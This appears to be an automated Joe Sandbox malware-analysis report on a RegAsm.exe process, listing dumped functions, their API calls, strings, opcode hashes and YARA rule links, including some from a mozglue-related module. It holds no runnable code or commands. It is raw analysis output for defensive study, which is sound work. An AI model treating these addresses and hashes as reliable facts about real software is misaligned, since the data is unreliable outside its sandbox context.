Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeavemallocmozalloc_abort
String ID: d
API String ID: 3517139297-2564639436
Opcode ID: 9db6b9b5dce7bef40b8a7cfcc0e4e5b660dcaac83b213e80d55ba4d5b39595a2
Instruction ID: 4c15468e5da2492d2edc0b8b391743baa811a01ee0d1d7c374916db98d5f0538
Opcode Fuzzy Hash: 9db6b9b5dce7bef40b8a7cfcc0e4e5b660dcaac83b213e80d55ba4d5b39595a2
Instruction Fuzzy Hash: FE11E122E0078897EB01DB69D8502FDF7B4EF96218B55A219DD45AB612EB30A5C4D380

Function 0040F128 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F13E

Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC5A
Part of subcall function 0042EC45: __CxxThrowException@8.LIBCMT ref: 0042EC6F
Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC80

Part of subcall function 0040F238: std::_Xinvalid_argument.LIBCPMT ref: 0040F242

_memmove.LIBCMT ref: 0040F190

Strings

invalid string position, xrefs: 0040F139

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position
API String ID: 3404309857-1799206989
Opcode ID: 91242230ce68a24c4f38e49356161a9258fe8054196df98927784ca714c59dc8
Instruction ID: e23b5eb9a1e42f9e221b8677ce3c7703de2c6ddbdd5f367577b3bfe0c378d6ff
Opcode Fuzzy Hash: 91242230ce68a24c4f38e49356161a9258fe8054196df98927784ca714c59dc8
Instruction Fuzzy Hash: 0111E131304210DBDB24DE6DD88095973A6AF55324754063BF815EFAC2C33CED49879A

Function 6C0C3CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0C3D19
mozalloc_abort.MOZGLUE(?), ref: 6C0C3D6C

Strings

d, xrefs: 6C0C3D58

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: _errnomozalloc_abort
String ID: d
API String ID: 3471241338-2564639436
Opcode ID: 512944a02bf49f12bac4a9ba2361fb2596619bc0dcbe5448ce903ddfca39efd5
Instruction ID: b75e810b20a9b57e200baa22119fc146de78fa4899995bf91269f88e2d62af1f
Opcode Fuzzy Hash: 512944a02bf49f12bac4a9ba2361fb2596619bc0dcbe5448ce903ddfca39efd5
Instruction Fuzzy Hash: 8511C435F147889BDF008F69D8155EDB7B5EF9A318B448219EC459B612EF30A5C4C391

Function 6C0A1A50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

realloc.MOZGLUE(?,?), ref: 6C0A1A6B

Part of subcall function 6C0A1AF0: EnterCriticalSection.KERNEL32(?), ref: 6C0A1C36

mozalloc_abort.MOZGLUE(?), ref: 6C0A1AE7

Strings

d, xrefs: 6C0A1AB1

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: CriticalEnterSectionmozalloc_abortrealloc
String ID: d
API String ID: 2670432147-2564639436
Opcode ID: 278b9cdc1e281ff49a2919d2c5cf2cd06f6b880decd863632919cb45cb4f21f7
Instruction ID: a56bcf02103d5b242832a94501672120f0239bde8712ee8c81b04b746cdc2ade
Opcode Fuzzy Hash: 278b9cdc1e281ff49a2919d2c5cf2cd06f6b880decd863632919cb45cb4f21f7
Instruction Fuzzy Hash: CD11E032F00758D7DB048BE8D8146EEB7B5EFA5208F448619ED46AB652EB30E6C5C380

Function 6C094730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C0944B2,6C10E21C,6C10F7F8), ref: 6C09473E
GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C09474A

Strings

GetNtLoaderAPI, xrefs: 6C094744

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetNtLoaderAPI
API String ID: 1646373207-1628273567
Opcode ID: ef69f415780ce355d0419a4e30bd710cb279dbe489a4cbcdb3ec61cd34058aac
Instruction ID: c42c8c834a78f472a6071630ae23e177d22ec3032ce8d70ff9189ab47a0a36d3
Opcode Fuzzy Hash: ef69f415780ce355d0419a4e30bd710cb279dbe489a4cbcdb3ec61cd34058aac
Instruction Fuzzy Hash: D8018C757002189FDF00AFA68889759BBF9FB8A391B04406AE915C7700CF74D901AF91

Function 0040F34D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F35C

Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC5A
Part of subcall function 0042EC45: __CxxThrowException@8.LIBCMT ref: 0042EC6F
Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC80

memmove.MSVCRT(0040EEBE,0040EEBE,C6C68B00,0040EEBE,0040EEBE,0040F15F,?,?,?,0040F1DF,?,?,?,75920440,?,-00000001), ref: 0040F392

Strings

invalid string position, xrefs: 0040F357

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
String ID: invalid string position
API String ID: 1659287814-1799206989
Opcode ID: 348d0c2b69c2b191df159d42681712194dc71b74dbe289b0b6df523c31963809
Instruction ID: a91313bf5449129972d3e0b6c61bf396901b99abf7d864de5386db584678c47f
Opcode Fuzzy Hash: 348d0c2b69c2b191df159d42681712194dc71b74dbe289b0b6df523c31963809
Instruction Fuzzy Hash: 6F01AD713007018BD7348E7989C491FB2E2EB85B21734493ED882D7B85DB7CE84E8398

Function 004281CD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

strcpy_s.MSVCRT ref: 004281DE
__invoke_watson.LIBCMT ref: 00428232

Part of subcall function 0042806D: _strcat_s.LIBCMT ref: 0042808C

Strings

,NC, xrefs: 0042821D

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __invoke_watson_strcat_sstrcpy_s
String ID: ,NC
API String ID: 1132195725-1329140791
Opcode ID: 731b6ac6b642e3e8e5147aea8b100b6241764734f43c48f2503a638a59afb5d8
Instruction ID: 7263c20261f1d33d4cce58c4812a6ccf3018c0f2168d81fa3d23ea862a0e3966
Opcode Fuzzy Hash: 731b6ac6b642e3e8e5147aea8b100b6241764734f43c48f2503a638a59afb5d8
Instruction Fuzzy Hash: A0F0C872641228BFDB116A91EC02EDB3F59EF04350F854066F91955111DA36AD54C764

Function 6C0E6DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C0E6E22
__Init_thread_footer.LIBCMT ref: 6C0E6E3F

Strings

MOZ_DISABLE_WALKTHESTACK, xrefs: 6C0E6E1D

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: Init_thread_footergetenv
String ID: MOZ_DISABLE_WALKTHESTACK
API String ID: 1472356752-1153589363
Opcode ID: f19c4d9341f1e5bd8ce774aa244457a25d419aff739cf87f2eee30398026f381
Instruction ID: 2020f6a6c3f1faa1f3e1ee9e13ba3c365fe42825dce3b77395c504ce746db1fb
Opcode Fuzzy Hash: f19c4d9341f1e5bd8ce774aa244457a25d419aff739cf87f2eee30398026f381
Instruction Fuzzy Hash: E6F024343842448FDA00CB68E866B9537F2D70721CF144169C52047BD2CF31B507DE9B

Function 6C099E70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 6C099EEF

Strings

NaN, xrefs: 6C099EC1
Infinity, xrefs: 6C099EB7

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: Init_thread_footer
String ID: Infinity$NaN
API String ID: 1385522511-4285296124
Opcode ID: 3a9227abbdeee556f19d41315ea181bd4792d7ebdfeec1e8fb14ad6267590b58
Instruction ID: eee683b2c1cd5b55d8be7ddd87f2469219c30dd9059ce6be030b852f1cbd6a71
Opcode Fuzzy Hash: 3a9227abbdeee556f19d41315ea181bd4792d7ebdfeec1e8fb14ad6267590b58
Instruction Fuzzy Hash: BAF08770700241CADA00CB18E84BB8033F1B703318F248A1CC9340AB81DF366586EB8A

Function 0041F3BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 0041F3F0
DName::DName.LIBCMT ref: 0041F3FC

Strings

{flat}, xrefs: 0041F3EB

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: NameName::
String ID: {flat}
API String ID: 1333004437-2606204563
Opcode ID: c0aecf38d8767bf2edb4203e1a237864f4bfc1262168b0dc7fac00c370597be1
Instruction ID: da75913b68d6d07b0bcc9ceeb751d75e82138ebb165cf24839429cfec7228cb0
Opcode Fuzzy Hash: c0aecf38d8767bf2edb4203e1a237864f4bfc1262168b0dc7fac00c370597be1
Instruction Fuzzy Hash: 75F08535244208AFCB11EF59D445AE43BA0AF8575AF08808AF9484F293C774E882CB99

Function 6C0E5900 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

SetEnvironmentVariableW.KERNEL32(MOZ_SKELETON_UI_RESTARTING,6C1051C8), ref: 6C0E591A
CloseHandle.KERNEL32(FFFFFFFF), ref: 6C0E592B

Strings

MOZ_SKELETON_UI_RESTARTING, xrefs: 6C0E5915

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: CloseEnvironmentHandleVariable
String ID: MOZ_SKELETON_UI_RESTARTING
API String ID: 297244470-335682676
Opcode ID: 339436996d10e4a29927e613a009c4e495d5f6380704b18334de37d504e6c333
Instruction ID: b8ebb99631352f13c063c3a52df9bb99e185c7abb2cf172f0ae94323d0093e34
Opcode Fuzzy Hash: 339436996d10e4a29927e613a009c4e495d5f6380704b18334de37d504e6c333
Instruction Fuzzy Hash: 8FE04F34345244FBDB005B68C90C7867FF9AB17329F148948F5B993AD2CBB5A8809791

Function 0040141E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00401436
GlobalMemoryStatusEx.KERNEL32(?), ref: 00401449

Strings

@, xrefs: 00401442

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: GlobalMemoryStatus_memset
String ID: @
API String ID: 587104284-2766056989
Opcode ID: ea78773fa3532b546fc2bed9ec4844f5fa5bd431fc3f66efb89effc32c35708b
Instruction ID: 109ca1747397a3c99a2e715ad0f668a42f12933073e5ea0efda9a81ab0e3fd91
Opcode Fuzzy Hash: ea78773fa3532b546fc2bed9ec4844f5fa5bd431fc3f66efb89effc32c35708b
Instruction Fuzzy Hash: 7BE0B8F1D002089BDB54DFA5ED46B5D77F89B08708F5000299A05F7181D674AA099659

Function 6C09BED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15librarythreadCOMMON

Download Yara Rule

APIs

DisableThreadLibraryCalls.KERNEL32(?), ref: 6C09BEE3
LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6C09BEF5

Strings

cryptbase.dll, xrefs: 6C09BEF0

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: Library$CallsDisableLoadThread
String ID: cryptbase.dll
API String ID: 4137859361-1262567842
Opcode ID: 4c87fc666bae458c6951e196f06699457d79083aa39315daa317bc48f22bb374
Instruction ID: 54a4978e734f23356785a50f7622391553634153a0484123d6f5ea4fa9751a1e
Opcode Fuzzy Hash: 4c87fc666bae458c6951e196f06699457d79083aa39315daa317bc48f22bb374
Instruction Fuzzy Hash: 4DD0C932384608EADA50ABA08D0AF2A3BFCA712729F50C025F75594991CBB1A850EB94

Function 6C0850E0 Relevance: 5.2, APIs: 4, Instructions: 213COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C084E9C,?,?,?,?,?), ref: 6C08510A
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C084E9C,?,?,?,?,?), ref: 6C085167
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?), ref: 6C085196
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C084E9C), ref: 6C085234

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
Instruction ID: 32cbe4bd0b12b600f1d6761f7fff4f5bb8037de0e79f37e235606682943ecd76
Opcode Fuzzy Hash: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
Instruction Fuzzy Hash: 84918B39506616CFDF14CF08C490A5ABBE2AF89318B28C588ED599B715D771FC82CBE0

Function 6C0C08F0 Relevance: 5.2, APIs: 4, Instructions: 165COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C10E7DC), ref: 6C0C0918
LeaveCriticalSection.KERNEL32(6C10E7DC), ref: 6C0C09A6
EnterCriticalSection.KERNEL32(6C10E7DC,?,00000000), ref: 6C0C09F3
LeaveCriticalSection.KERNEL32(6C10E7DC), ref: 6C0C0ACB

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 37bc7769dea81987db690274b103332522407fc8cef706d84525f8bd0d0b8be6
Instruction ID: 0a18c502286916959c27731a28527ea4ba965a09964c7c49cde8945b20e2dc91
Opcode Fuzzy Hash: 37bc7769dea81987db690274b103332522407fc8cef706d84525f8bd0d0b8be6
Instruction Fuzzy Hash: 23513B727095508BEB089B55C44476E73F1EF86B2CB24853ED9A597F80DF31E901CAD2

Function 6C0E59C0 Relevance: 5.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

malloc.MOZGLUE(?,?,?,?,?,?,?,?,00000008,?,6C0BE56A,?,|UrlbarCSSSpan,0000000E,?), ref: 6C0E5A47
memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,00000008,?,6C0BE56A,?,|UrlbarCSSSpan), ref: 6C0E5A5C
free.MOZGLUE(?), ref: 6C0E5A97
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000010), ref: 6C0E5B9D

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: free$mallocmemset
String ID:
API String ID: 2682772760-0
Opcode ID: b1639eb391cf8492df59aba555840e5ea308e738a331d76f47d6d30474141360
Instruction ID: 72993e6bc67e835003380540b4d23d7426e45dd66ed7b24bb150c4f2887b6cdd
Opcode Fuzzy Hash: b1639eb391cf8492df59aba555840e5ea308e738a331d76f47d6d30474141360
Instruction Fuzzy Hash: 37513B746487509FD700CF29C8C0B1ABBE5EF8E318F08C96DE8899B646D774E945CB62

Function 6C0DB5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C0DB2C9,?,?,?,6C0DB127,?,?,?,?,?,?,?,?,?,6C0DAE52), ref: 6C0DB628

Part of subcall function 6C0D90E0: free.MOZGLUE(?,00000000,?,?,6C0DDEDB), ref: 6C0D90FF
Part of subcall function 6C0D90E0: free.MOZGLUE(?,00000000,?,?,6C0DDEDB), ref: 6C0D9108

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C0DB2C9,?,?,?,6C0DB127,?,?,?,?,?,?,?,?,?,6C0DAE52), ref: 6C0DB67D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C0DB2C9,?,?,?,6C0DB127,?,?,?,?,?,?,?,?,?,6C0DAE52), ref: 6C0DB708
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C0DB127,?,?,?,?,?,?,?,?), ref: 6C0DB74D

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: e2945871d6e717768241d63144e786abf23779b574a0fb0c6ea0a6c28a5b10b3
Instruction ID: adbaf8837a8a195d2725f435b6f36f259e1c34c5185c2063e5cffe3546b784fe
Opcode Fuzzy Hash: e2945871d6e717768241d63144e786abf23779b574a0fb0c6ea0a6c28a5b10b3
Instruction Fuzzy Hash: 6F51A9B5A057168BEB14CF18C98076EB7F5BF89304F46852DD85AABB00DB31F904CBA1

Function 6C0DDF90 Relevance: 5.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C0CFF2A), ref: 6C0DDFFD

Part of subcall function 6C0D90E0: free.MOZGLUE(?,00000000,?,?,6C0DDEDB), ref: 6C0D90FF
Part of subcall function 6C0D90E0: free.MOZGLUE(?,00000000,?,?,6C0DDEDB), ref: 6C0D9108

